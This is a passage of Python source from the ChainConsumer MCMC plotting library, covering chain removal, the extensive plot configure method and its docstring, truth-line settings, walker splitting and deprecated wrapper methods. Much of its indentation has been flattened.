marker_alpha : numeric, optional
The alpha values when plotting markers.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
chain = np.vstack((location, location))
posterior = np.array([0, 1])
self.add_chain(
chain,
parameters=parameters,
posterior=posterior,
name=name,
color=color,
marker_size=marker_size,
marker_style=marker_style,
marker_alpha=marker_alpha,
plot_point=True,
plot_contour=False,
)
self.chains[-1].mcmc_chain = False # So we dont plot this when looking at walks, etc
return self
def remove_chain(self, chain=-1):
r""" Removes a chain from ChainConsumer.
Calling this will require any configurations set to be redone!
Parameters
----------
chain : int|str, list[str|int]
The chain(s) to remove. You can pass in either the chain index, or the chain name, to remove it.
By default removes the last chain added.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
if isinstance(chain, str) or isinstance(chain, int):
chain = [chain]
chain = sorted([i for c in chain for i in self._get_chain(c)])[::-1]
assert len(chain) == len(list(set(chain))), "Error, you are trying to remove a chain more than once."
for index in chain:
del self.chains[index]
seen = set()
self._all_parameters = [p for c in self.chains for p in c.parameters if not (p in seen or seen.add(p))]
# Need to reconfigure
self._init_params()
return self
def configure(
self,
statistics="max",
max_ticks=5,
plot_hists=True,
flip=True,
serif=False,
sigma2d=False,
sigmas=None,
summary=None,
bins=None,
cmap=None,
colors=None,
linestyles=None,
linewidths=None,
kde=False,
smooth=None,
cloud=None,
shade=None,
shade_alpha=None,
shade_gradient=None,
bar_shade=None,
num_cloud=None,
color_params=None,
plot_color_params=False,
cmaps=None,
plot_contour=None,
plot_point=None,
show_as_1d_prior=None,
global_point=True,
marker_style=None,
marker_size=None,
marker_alpha=None,
usetex=False,
diagonal_tick_labels=True,
label_font_size=12,
tick_font_size=10,
spacing=None,
contour_labels=None,
contour_label_font_size=10,
legend_kwargs=None,
legend_location=None,
legend_artists=None,
legend_color_text=True,
watermark_text_kwargs=None,
summary_area=0.6827,
zorder=None,
stack=False,
): # pragma: no cover
r""" Configure the general plotting parameters common across the bar
and contour plots.
If you do not call this explicitly, the :func:`plot`
method will invoke this method automatically.
Please ensure that you call this method *after* adding all the relevant data to the
chain consumer, as the consume changes configuration values depending on
the supplied data.
Parameters
----------
statistics : string|list[str], optional
Which sort of statistics to use. Defaults to `"max"` for maximum likelihood
statistics. Other available options are `"mean"`, `"cumulative"`, `"max_symmetric"`,
`"max_closest"` and `"max_central"`. In the
very, very rare case you want to enable different statistics for different
chains, you can pass in a list of strings.
max_ticks : int, optional
The maximum number of ticks to use on the plots
plot_hists : bool, optional
Whether to plot marginalised distributions or not
flip : bool, optional
Set to false if, when plotting only two parameters, you do not want it to
rotate the histogram so that it is horizontal.
sigma2d: bool, optional
Defaults to `False`. When `False`, uses :math:`\sigma` levels for 1D Gaussians - ie confidence
levels of 68% and 95%. When `True`, uses the confidence levels for 2D Gaussians, where 1 and 2
:math:`\sigma` represents 39% and 86% confidence levels respectively.
sigmas : np.array, optional
The :math:`\sigma` contour levels to plot. Defaults to [0, 1, 2, 3] for a single chain
and [0, 1, 2] for multiple chains.
serif : bool, optional
Whether to display ticks and labels with serif font.
summary : bool, optional
If overridden, sets whether parameter summaries should be set as axis titles.
Will not work if you have multiple chains
bins : int|float,list[int|float], optional
The number of bins to use. By default uses :math:`\frac{\sqrt{n}}{10}`, where
:math:`n` are the number of data points. Giving an integer will set the number
of bins to the given value. Giving a float will scale the number of bins, such
that giving ``bins=1.5`` will result in using :math:`\frac{1.5\sqrt{n}}{10}` bins.
Note this parameter is most useful if `kde=False` is also passed, so you
can actually see the bins and not a KDE.
cmap : str, optional
Set to the matplotlib colour map you want to use to overwrite the default colours.
Note that this parameter overwrites colours. The `cmaps` parameters is different,
and used when you ask for an extra dimension to be used to colour scatter points.
See the online examples to see the difference.
colors : str(hex)|list[str(hex)], optional
Provide a list of colours to use for each chain. If you provide more chains
than colours, you *will* get the rainbow colour spectrum. If you only pass
one colour, all chains are set to this colour. This probably won't look good.
linestyles : str|list[str], optional
Provide a list of line styles to plot the contours and marginalised
distributions with. By default, this will become a list of solid lines. If a
string is passed instead of a list, this style is used for all chains.
linewidths : float|list[float], optional
Provide a list of line widths to plot the contours and marginalised
distributions with. By default, this is a width of 1. If a float
is passed instead of a list, this width is used for all chains.
kde : bool|float|list[bool|float], optional
Whether to use a Gaussian KDE to smooth marginalised posteriors. If false, uses
bins and linear interpolation, so ensure you have plenty of samples if your
distribution is highly non-gaussian. Due to the slowness of performing a
KDE on all data, it is often useful to disable this before producing final
plots. If float, scales the width of the KDE bandpass manually.
smooth : int|list[int], optional
Defaults to 3. How much to smooth the marginalised distributions using a gaussian filter.
If ``kde`` is set to true, this parameter is ignored. Setting it to either
``0``, ``False`` disables smoothing. For grid data, smoothing
is set to 0 by default, not 3.
cloud : bool|list[bool], optional
If set, overrides the default behaviour and plots the cloud or not
shade : bool|list[bool] optional
If set, overrides the default behaviour and plots filled contours or not. If a list of
bools is passed, you can turn shading on or off for specific chains.
shade_alpha : float|list[float], optional
Filled contour alpha value override. Default is 1.0. If a list is passed, you can set the
shade opacity for specific chains.
shade_gradient : float|list[float], optional
How much to vary colours in different contour levels.
bar_shade : bool|list[bool], optional
If set to true, shades in confidence regions in under histogram. By default
this happens if you less than 3 chains, but is disabled if you are comparing
more chains. You can pass a list if you wish to shade some chains but not others.
num_cloud : int|list[int], optional
The number of scatter points to show when enabling `cloud` or setting one of the parameters
to colour scatter. Defaults to 15k per chain.
color_params : str|list[str], optional
The name of the parameter to use for the colour scatter. Defaults to none, for no colour. If set
to 'weights', 'log_weights', or 'posterior' (without the quotes), and that is not a parameter in the chain,
it will respectively use the weights, log weights, or posterior, to colour the points.
plot_color_params : bool|list[bool], optional
Whether or not the colour parameter should also be plotted as a posterior surface.
cmaps : str|list[str], optional
The matplotlib colourmap to use in the `colour_param`. If you have multiple `color_param`s, you can
specific a different cmap for each variable. By default ChainConsumer will cycle between several
cmaps.
plot_contour : bool|list[bool], optional
Whether to plot the whole contour (as opposed to a point). Defaults to true for less than
25 concurrent chains.
plot_point : bool|list[bool], optional
Whether to plot a maximum likelihood point. Defaults to true for more then 24 chains.
show_as_1d_prior : bool|list[bool], optional
Showing as a 1D prior will show the 1D histograms, but won't plot the 2D contours.
global_point : bool, optional
Whether the point which gets plotted is the global posterior maximum, or the marginalised 2D
posterior maximum. Note that when you use marginalised 2D maximums for the points, you do not
get the 1D histograms. Defaults to `True`, for a global maximum value.
marker_style : str|list[str], optional
The marker style to use when plotting points. Defaults to `'.'`
marker_size : numeric|list[numeric], optional
Size of markers, if plotted. Defaults to `20`.
marker_alpha : numeric|list[numeric], optional
The alpha values when plotting markers.
usetex : bool, optional
Whether or not to parse text as LaTeX in plots.
diagonal_tick_labels : bool, optional
Whether to display tick labels on a 45 degree angle.
label_font_size : int|float, optional
The font size for plot axis labels and axis titles if summaries are configured to display.
tick_font_size : int|float, optional
The font size for the tick labels in the plots.
spacing : float, optional
The amount of spacing to add between plots. Defaults to `None`, which equates to 1.0 for less
than 6 dimensions and 0.0 for higher dimensions.
contour_labels : string, optional
If unset do not plot contour labels. If set to "confidence", label the using confidence
intervals. If set to "sigma", labels using sigma.
contour_label_font_size : int|float, optional
The font size for contour labels, if they are enabled.
legend_kwargs : dict, optional
Extra arguments to pass to the legend api.
legend_location : tuple(int,int), optional
Specifies the subplot in which to locate the legend. By default, this will be (0, -1),
corresponding to the top right subplot if there are more than two parameters,
and the bottom left plot for only two parameters with flip on.
For having the legend in the primary subplot
in the bottom left, set to (-1,0).
legend_artists : bool, optional
Whether to include hide artists in the legend. If all linestyles and line widths are identical,
this will default to false (as only the colours change). Otherwise it will be true.
legend_color_text : bool, optional
Whether to colour the legend text.
watermark_text_kwargs : dict, optional
Options to pass to the fontdict property when generating text for the watermark.
summary_area : float, optional
The confidence interval used when generating parameter summaries. Defaults to 1 sigma, aka 0.6827
zorder : int, optional
The zorder to pass to `matplotlib` to determine visual ordering when plotting.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
# Warn the user if configure has been invoked multiple times
self._num_configure_calls += 1
if self._num_configure_calls > 1:
self._logger.warning("Configure has been called %d times - this is not good - it should be once!" % self._num_configure_calls)
self._logger.warning("To avoid this, load your chains in first, then call analysis/plotting methods")
# Dirty way of ensuring overrides happen when requested
l = locals()
explicit = []
for k in l.keys():
if l[k] is not None:
explicit.append(k)
if k.endswith("s"):
explicit.append(k[:-1])
self._init_params()
num_chains = len(self.chains)
assert cmap is None or colors is None, "You cannot both ask for cmap colours and then give explicit colours"
# Determine statistics
assert statistics is not None, "statistics should be a string or list of strings!"
if isinstance(statistics, str):
assert statistics in list(Analysis.summaries), "statistics %s not recognised. Should be in %s" % (statistics, Analysis.summaries,)
statistics = [statistics.lower()] * len(self.chains)
elif isinstance(statistics, list):
for i, l in enumerate(statistics):
statistics[i] = l.lower()
else:
raise ValueError("statistics is not a string or a list!")
# Determine KDEs
if isinstance(kde, bool) or isinstance(kde, float):
kde = [False if c.grid else kde for c in self.chains]
kde_override = [c.kde for c in self.chains]
kde = [c2 if c2 is not None else c1 for c1, c2 in zip(kde, kde_override)]
# Determine bins
if bins is None:
bins = get_bins(self.chains)
elif isinstance(bins, list):
bins = [b2 if isinstance(b2, int) else np.floor(b2 * b1) for b1, b2 in zip(get_bins(self.chains), bins)]
elif isinstance(bins, float):
bins = [np.floor(b * bins) for b in get_bins(self.chains)]
elif isinstance(bins, int):
bins = [bins] * len(self.chains)
else:
raise ValueError("bins value is not a recognised class (float or int)")
# Determine smoothing
if smooth is None:
smooth = [0 if c.grid or k else 3 for c, k in zip(self.chains, kde)]
else:
if smooth is not None and not smooth:
smooth = 0
if isinstance(smooth, list):
smooth = [0 if k else s for s, k in zip(smooth, kde)]
else:
smooth = [0 if k else smooth for k in kde]
# Determine color parameters
if color_params is None:
color_params = [None] * num_chains
else:
if isinstance(color_params, str):
color_params = [color_params if color_params in cs.parameters + ["log_weights", "weights", "posterior"] else None for cs in self.chains]
color_params = [None if c == "posterior" and self.chains[i].posterior is None else c for i, c in enumerate(color_params)]
elif isinstance(color_params, list) or isinstance(color_params, tuple):
for c, chain in zip(color_params, self.chains):
p = chain.parameters
if c is not None:
assert c in p, "Color parameter %s not in parameters %s" % (c, p)
# Determine if we should plot color parameters
if isinstance(plot_color_params, bool):
plot_color_params = [plot_color_params] * len(color_params)
# Determine cmaps
if cmaps is None:
param_cmaps = {}
cmaps = []
i = 0
for cp in color_params:
if cp is None:
cmaps.append(None)
elif cp in param_cmaps:
cmaps.append(param_cmaps[cp])
else:
param_cmaps[cp] = self._cmaps[i]
cmaps.append(self._cmaps[i])
i = (i + 1) % len(self._cmaps)
# Determine colours
if colors is None:
if cmap:
colors = self.color_finder.get_colormap(num_chains, cmap)
else:
if num_chains > len(self._all_colours):
num_needed_colours = np.sum([c is None for c in color_params])
colour_list = self.color_finder.get_colormap(num_needed_colours, "inferno")
else:
colour_list = self._all_colours
colors = []
ci = 0
for c in color_params:
if c:
colors.append("#000000")
else:
colors.append(colour_list[ci])
ci += 1
elif isinstance(colors, str):
colors = [colors] * len(self.chains)
colors = self.color_finder.get_formatted(colors)
# Determine linestyles
if linestyles is None:
i = 0
linestyles = []
for c in color_params:
if c is None:
linestyles.append(self._linestyles[0])
else:
linestyles.append(self._linestyles[i])
i = (i + 1) % len(self._linestyles)
elif isinstance(linestyles, str):
linestyles = [linestyles] * len(self.chains)
# Determine linewidths
if linewidths is None:
linewidths = [1.0] * len(self.chains)
elif isinstance(linewidths, float) or isinstance(linewidths, int):
linewidths = [linewidths] * len(self.chains)
# Determine clouds
if cloud is None:
cloud = False
cloud = [cloud or c is not None for c in color_params]
# Determine cloud points
if num_cloud is None:
num_cloud = 30000
if isinstance(num_cloud, int) or isinstance(num_cloud, float):
num_cloud = [int(num_cloud)] * num_chains
# Should we shade the contours
if shade is None:
if shade_alpha is None:
shade = num_chains <= 3
else:
shade = True
if isinstance(shade, bool):
# If not overridden, do not shade chains with colour scatter points
shade = [shade and c is None for c in color_params]
# Modify shade alpha based on how many chains we have
if shade_alpha is None:
if num_chains == 1:
if contour_labels is not None:
shade_alpha = 0.75
else:
shade_alpha = 1.0
else:
shade_alpha = 1.0 / np.sqrt(num_chains)
# Decrease the shading amount if there are colour scatter points
if isinstance(shade_alpha, float) or isinstance(shade_alpha, int):
shade_alpha = [shade_alpha if c is None else 0.25 * shade_alpha for c in color_params]
if shade_gradient is None:
shade_gradient = 1.0
if isinstance(shade_gradient, float):
shade_gradient = [shade_gradient] * num_chains
elif isinstance(shade_gradient, list):
assert len(shade_gradient) == num_chains, "Have %d shade_gradient but % chains" % (len(shade_gradient), num_chains,)
contour_over_points = num_chains < 20
if plot_contour is None:
plot_contour = [contour_over_points if chain.posterior is not None else True for chain in self.chains]
elif isinstance(plot_contour, bool):
plot_contour = [plot_contour] * num_chains
if plot_point is None:
plot_point = [not contour_over_points] * num_chains
elif isinstance(plot_point, bool):
plot_point = [plot_point] * num_chains
if show_as_1d_prior is None:
show_as_1d_prior = [not contour_over_points] * num_chains
elif isinstance(show_as_1d_prior, bool):
show_as_1d_prior = [show_as_1d_prior] * num_chains
if marker_style is None:
marker_style = ["."] * num_chains
elif isinstance(marker_style, str):
marker_style = [marker_style] * num_chains
if marker_size is None:
marker_size = [20] * num_chains
elif isinstance(marker_style, (int, float)):
marker_size = [marker_size] * num_chains
if marker_alpha is None:
marker_alpha = [1.0] * num_chains
elif isinstance(marker_alpha, (int, float)):
marker_alpha = [marker_alpha] * num_chains
# Figure out if we should display parameter summaries
if summary is not None:
summary = summary and num_chains == 1
# Figure out bar shading
if bar_shade is None:
bar_shade = num_chains <= 3
if isinstance(bar_shade, bool):
bar_shade = [bar_shade] * num_chains
if zorder is None:
zorder = [1] * num_chains
# Figure out how many sigmas to plot.
if sigmas is None:
    # Dead branch removed: the old num_chains == 1 check produced the
    # identical array in both branches.
    sigmas = np.array([0, 1, 2])
# Contours are drawn outward from 0, so ensure 0 is present and sorted first.
if sigmas[0] != 0:
    sigmas = np.concatenate(([0], sigmas))
sigmas = np.sort(sigmas)
if contour_labels is not None:
assert isinstance(contour_labels, str), "contour_labels parameter should be a string"
contour_labels = contour_labels.lower()
assert contour_labels in ["sigma", "confidence",], "contour_labels should be either sigma or confidence"
assert isinstance(contour_label_font_size, int) or isinstance(contour_label_font_size, float), "contour_label_font_size needs to be numeric"
if legend_artists is None:
legend_artists = len(set(linestyles)) > 1 or len(set(linewidths)) > 1
if legend_kwargs is not None:
assert isinstance(legend_kwargs, dict), "legend_kwargs should be a dict"
else:
legend_kwargs = {}
if num_chains < 3:
labelspacing = 0.5
elif num_chains == 3:
labelspacing = 0.2
else:
labelspacing = 0.15
legend_kwargs_default = {
"labelspacing": labelspacing,
"loc": "upper right",
"frameon": False,
"fontsize": label_font_size,
"handlelength": 1,
"handletextpad": 0.2,
"borderaxespad": 0.0,
}
legend_kwargs_default.update(legend_kwargs)
watermark_text_kwargs_default = {
"color": "#333333",
"alpha": 0.7,
"verticalalignment": "center",
"horizontalalignment": "center",
}
if watermark_text_kwargs is None:
watermark_text_kwargs = {}
watermark_text_kwargs_default.update(watermark_text_kwargs)
assert isinstance(summary_area, float), "summary_area needs to be a float, not %s!" % type(summary_area)
assert summary_area > 0, "summary_area should be a positive number, instead is %s!" % summary_area
assert summary_area < 1, "summary_area must be less than unity, instead is %s!" % summary_area
assert isinstance(global_point, bool), "global_point should be a bool"
# List options
# Apply every per-chain (list) option to each chain's own config. Options
# are only applied if the user has not already set them, unless `explicit`
# forces an override.
for i, c in enumerate(self.chains):
    try:
        c.update_unset_config("statistics", statistics[i], override=explicit)
        c.update_unset_config("color", colors[i], override=explicit)
        c.update_unset_config("linestyle", linestyles[i], override=explicit)
        c.update_unset_config("linewidth", linewidths[i], override=explicit)
        c.update_unset_config("cloud", cloud[i], override=explicit)
        c.update_unset_config("shade", shade[i], override=explicit)
        c.update_unset_config("shade_alpha", shade_alpha[i], override=explicit)
        c.update_unset_config("shade_gradient", shade_gradient[i], override=explicit)
        c.update_unset_config("bar_shade", bar_shade[i], override=explicit)
        c.update_unset_config("bins", bins[i], override=explicit)
        c.update_unset_config("kde", kde[i], override=explicit)
        c.update_unset_config("smooth", smooth[i], override=explicit)
        c.update_unset_config("color_params", color_params[i], override=explicit)
        c.update_unset_config("plot_color_params", plot_color_params[i], override=explicit)
        c.update_unset_config("cmap", cmaps[i], override=explicit)
        c.update_unset_config("num_cloud", num_cloud[i], override=explicit)
        c.update_unset_config("marker_style", marker_style[i], override=explicit)
        c.update_unset_config("marker_size", marker_size[i], override=explicit)
        c.update_unset_config("marker_alpha", marker_alpha[i], override=explicit)
        c.update_unset_config("plot_contour", plot_contour[i], override=explicit)
        c.update_unset_config("plot_point", plot_point[i], override=explicit)
        c.update_unset_config("show_as_1d_prior", show_as_1d_prior[i], override=explicit)
        c.update_unset_config("zorder", zorder[i], override=explicit)
        c.config["summary_area"] = summary_area
    except IndexError as e:
        # Bug fix: this previously caught IndentationError, which list
        # indexing can never raise, so the helpful message below was
        # unreachable and a short options list crashed without guidance.
        print(
            "Index error when assigning chain properties, make sure you "
            "have enough properties set for the number of chains you have loaded! "
            "See the stack trace for which config item has the wrong number of entries."
        )
        raise e
# Non list options
self.config["sigma2d"] = sigma2d
self.config["sigmas"] = sigmas
self.config["summary"] = summary
self.config["flip"] = flip
self.config["serif"] = serif
self.config["plot_hists"] = plot_hists
self.config["max_ticks"] = max_ticks
self.config["usetex"] = usetex
self.config["diagonal_tick_labels"] = diagonal_tick_labels
self.config["label_font_size"] = label_font_size
self.config["tick_font_size"] = tick_font_size
self.config["spacing"] = spacing
self.config["contour_labels"] = contour_labels
self.config["contour_label_font_size"] = contour_label_font_size
self.config["legend_location"] = legend_location
self.config["legend_kwargs"] = legend_kwargs_default
self.config["legend_artists"] = legend_artists
self.config["legend_color_text"] = legend_color_text
self.config["watermark_text_kwargs"] = watermark_text_kwargs_default
self.config["global_point"] = global_point
self._configured = True
return self
def configure_truth(self, **kwargs):  # pragma: no cover
    r"""Configure the arguments passed to the ``axvline`` and ``axhline``
    methods when plotting truth values.

    If you do not call this explicitly, the :func:`plot` method will
    invoke this method automatically.

    Recommended to set the parameters ``linestyle``, ``color`` and/or
    ``alpha`` if you want some basic control. Default is an opaque black
    dashed line.

    Parameters
    ----------
    kwargs : dict
        The keyword arguments to unwrap when calling ``axvline`` and ``axhline``.

    Returns
    -------
    ChainConsumer
        Itself, to allow chaining calls.
    """
    # Each default is applied only when neither the short nor the long
    # spelling of the option was supplied (or was explicitly None).
    fallbacks = (
        (("ls", "linestyle"), "ls", "--"),
        (("lw", "linewidth"), "linewidth", 1),
        (("color",), "color", "#000000"),
        (("zorder",), "zorder", 100),
    )
    for aliases, target_key, default_value in fallbacks:
        if all(kwargs.get(alias) is None for alias in aliases):
            kwargs[target_key] = default_value
    self.config_truth = kwargs
    self._configured_truth = True
    return self
def divide_chain(self, chain=0):
    r"""Return a ChainConsumer instance containing all the walks of a given
    chain as individual chains themselves.

    Useful if, for example, your chain was made using MCMC with 4 walkers:
    to check the sampling of all 4 walkers agree, call this to get a
    ChainConsumer instance with one chain per walker, then plot and
    hopefully all four contours agree.

    Parameters
    ----------
    chain : int|str, optional
        The index or name of the chain you want divided

    Returns
    -------
    ChainConsumer
        A new ChainConsumer instance with the same settings as the parent
        instance, containing ``num_walker`` chains.
    """
    result = ChainConsumer()
    for idx in self._get_chain(chain):
        source = self.chains[idx]
        assert source.walkers is not None, "The chain you have selected was not added with any walkers!"
        # Split both samples and weights into one slab per walker.
        sample_slabs = np.split(source.chain, source.walkers)
        weight_slabs = np.split(source.weights, source.walkers)
        for walker_index, (samples, weights) in enumerate(zip(sample_slabs, weight_slabs)):
            result.add_chain(samples, weights=weights, name="Chain %d" % walker_index, parameters=source.parameters)
    return result
def _get_chain(self, chain):
    """Resolve *chain* (a Chain object, a name, or an integer index) into a
    list of indices into ``self.chains``.

    Raises
    ------
    ValueError
        If *chain* is not a Chain, str, or int.
    """
    # Chain objects resolve to their position in the list.
    if isinstance(chain, Chain):
        return [self.chains.index(chain)]
    # Names may match more than one chain; return every match.
    if isinstance(chain, str):
        all_names = [c.name for c in self.chains]
        assert chain in all_names, "Chain %s not found!" % chain
        return [i for i, candidate in enumerate(all_names) if candidate == chain]
    if isinstance(chain, int):
        assert chain < len(self.chains), "Chain index %d not found!" % chain
        return [chain]
    raise ValueError("Type %s not recognised for chain" % type(chain))
def _get_chain_name(self, index):
return self.chains[index].name
def _all_names(self):
return [c.name for c in self.chains]
# Deprecated methods
# These thin wrappers predate the split of functionality into the
# plotter / analysis / diagnostic / comparison sub-objects. Each one
# prints a deprecation notice and delegates unchanged.
def plot(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.plotter.plot`` instead."""
    print("This method is deprecated. Please use chainConsumer.plotter.plot instead")
    return self.plotter.plot(*args, **kwargs)
def plot_walks(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.plotter.plot_walks`` instead."""
    print("This method is deprecated. Please use chainConsumer.plotter.plot_walks instead")
    return self.plotter.plot_walks(*args, **kwargs)
def get_latex_table(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_latex_table`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_latex_table instead")
    return self.analysis.get_latex_table(*args, **kwargs)
def get_parameter_text(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_parameter_text`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_parameter_text instead")
    return self.analysis.get_parameter_text(*args, **kwargs)
def get_summary(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_summary`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_summary instead")
    return self.analysis.get_summary(*args, **kwargs)
def get_correlations(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_correlations`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_correlations instead")
    return self.analysis.get_correlations(*args, **kwargs)
def get_correlation_table(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_correlation_table`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_correlation_table instead")
    return self.analysis.get_correlation_table(*args, **kwargs)
def get_covariance(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_covariance`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_covariance instead")
    return self.analysis.get_covariance(*args, **kwargs)
def get_covariance_table(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.analysis.get_covariance_table`` instead."""
    print("This method is deprecated. Please use chainConsumer.analysis.get_covariance_table instead")
    return self.analysis.get_covariance_table(*args, **kwargs)
def diagnostic_gelman_rubin(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.diagnostic.gelman_rubin`` instead."""
    print("This method is deprecated. Please use chainConsumer.diagnostic.gelman_rubin instead")
    return self.diagnostic.gelman_rubin(*args, **kwargs)
def diagnostic_geweke(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.diagnostic.geweke`` instead."""
    print("This method is deprecated. Please use chainConsumer.diagnostic.geweke instead")
    return self.diagnostic.geweke(*args, **kwargs)
def comparison_aic(self):  # pragma: no cover
    """Deprecated: use ``self.comparison.aic`` instead."""
    print("This method is deprecated. Please use chainConsumer.comparison.aic instead")
    return self.comparison.aic()
def comparison_bic(self):  # pragma: no cover
    """Deprecated: use ``self.comparison.bic`` instead."""
    print("This method is deprecated. Please use chainConsumer.comparison.bic instead")
    return self.comparison.bic()
def comparison_dic(self):  # pragma: no cover
    """Deprecated: use ``self.comparison.dic`` instead."""
    print("This method is deprecated. Please use chainConsumer.comparison.dic instead")
    return self.comparison.dic()
def comparison_table(self, *args, **kwargs):  # pragma: no cover
    """Deprecated: use ``self.comparison.comparison_table`` instead."""
    print("This method is deprecated. Please use chainConsumer.comparison.comparison_table instead")
    # Bug fix: removed a trailing "| PypiClean" web-scrape artifact that was
    # fused onto the return expression and would raise NameError at runtime.
    return self.comparison.comparison_table(*args, **kwargs)
# NOTE(review): removed trailing web-scrape artifacts that were not part of
# the source ("Subsets and Splits" / "No community queries yet" site text).